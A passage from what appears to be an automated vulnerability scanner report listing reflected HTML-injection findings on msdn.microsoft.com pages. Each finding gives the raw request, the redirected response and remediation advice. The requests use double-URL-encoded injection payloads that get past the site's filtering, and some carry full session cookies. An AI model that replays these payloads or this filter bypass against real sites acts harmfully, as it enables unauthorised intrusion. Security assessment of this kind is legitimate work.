Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/aa155072.aspxd906d"><a>ab4656b12f7" />
...[SNIP]...

2.19. http://msdn.microsoft.com/en-us/library/aa155073.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/aa155073.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbc85%2522%253e%253ca%253e836b0a1a57e was submitted in the REST URL parameter 1. This input was echoed as fbc85"><a>836b0a1a57e in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usfbc85%2522%253e%253ca%253e836b0a1a57e/library/aa155073.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usfbc85"><a>836b0a1a57e/library/aa155073" />
...[SNIP]...

2.20. http://msdn.microsoft.com/en-us/library/aa155073.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/aa155073.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc097%2522%253e%253ca%253e0c9278f4fd1 was submitted in the REST URL parameter 2. This input was echoed as fc097"><a>0c9278f4fd1 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryfc097%2522%253e%253ca%253e0c9278f4fd1/aa155073.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryfc097"><a>0c9278f4fd1/aa155073" />
...[SNIP]...

2.21. http://msdn.microsoft.com/en-us/library/aa155073.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/aa155073.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67843%2522%253e%253ca%253ee5b048815e6 was submitted in the REST URL parameter 3. This input was echoed as 67843"><a>e5b048815e6 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/aa155073.aspx67843%2522%253e%253ca%253ee5b048815e6 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/aa155073.aspx67843"><a>e5b048815e6" />
...[SNIP]...

2.22. http://msdn.microsoft.com/en-us/library/aa187916.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/aa187916.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83582%2522%253e%253ca%253e41cf0a39ac3 was submitted in the REST URL parameter 1. This input was echoed as 83582"><a>41cf0a39ac3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us83582%2522%253e%253ca%253e41cf0a39ac3/library/aa187916.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us83582"><a>41cf0a39ac3/library/aa187916" />
...[SNIP]...

2.23. http://msdn.microsoft.com/en-us/library/aa187916.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/aa187916.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da2c1%2522%253e%253ca%253ed10d1626b7c was submitted in the REST URL parameter 2. This input was echoed as da2c1"><a>d10d1626b7c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryda2c1%2522%253e%253ca%253ed10d1626b7c/aa187916.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryda2c1"><a>d10d1626b7c/aa187916" />
...[SNIP]...

2.24. http://msdn.microsoft.com/en-us/library/aa187916.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/aa187916.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56e58%2522%253e%253ca%253eb41c43eaea6 was submitted in the REST URL parameter 3. This input was echoed as 56e58"><a>b41c43eaea6 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/aa187916.aspx56e58%2522%253e%253ca%253eb41c43eaea6 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/aa187916.aspx56e58"><a>b41c43eaea6" />
...[SNIP]...

2.25. http://msdn.microsoft.com/en-us/library/bb726434(office.12 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb726434(office.12

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 757a2%2522%253e%253ca%253e39c3f7167ab was submitted in the REST URL parameter 1. This input was echoed as 757a2"><a>39c3f7167ab in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us757a2%2522%253e%253ca%253e39c3f7167ab/library/bb726434(office.12 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9220
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us757a2"><a>39c3f7167ab/library/bb726434(office.12" />
...[SNIP]...

2.26. http://msdn.microsoft.com/en-us/library/bb726434(office.12 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb726434(office.12

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ea44%2522%253e%253ca%253efa3efb9bd47 was submitted in the REST URL parameter 2. This input was echoed as 6ea44"><a>fa3efb9bd47 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library6ea44%2522%253e%253ca%253efa3efb9bd47/bb726434(office.12 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library6ea44"><a>fa3efb9bd47/bb726434(office.12" />
...[SNIP]...

2.27. http://msdn.microsoft.com/en-us/library/bb726434(office.12 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb726434(office.12

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7fbc%2522%253e%253ca%253eb1e36bffcd2 was submitted in the REST URL parameter 3. This input was echoed as d7fbc"><a>b1e36bffcd2 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/bb726434(office.12d7fbc%2522%253e%253ca%253eb1e36bffcd2 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
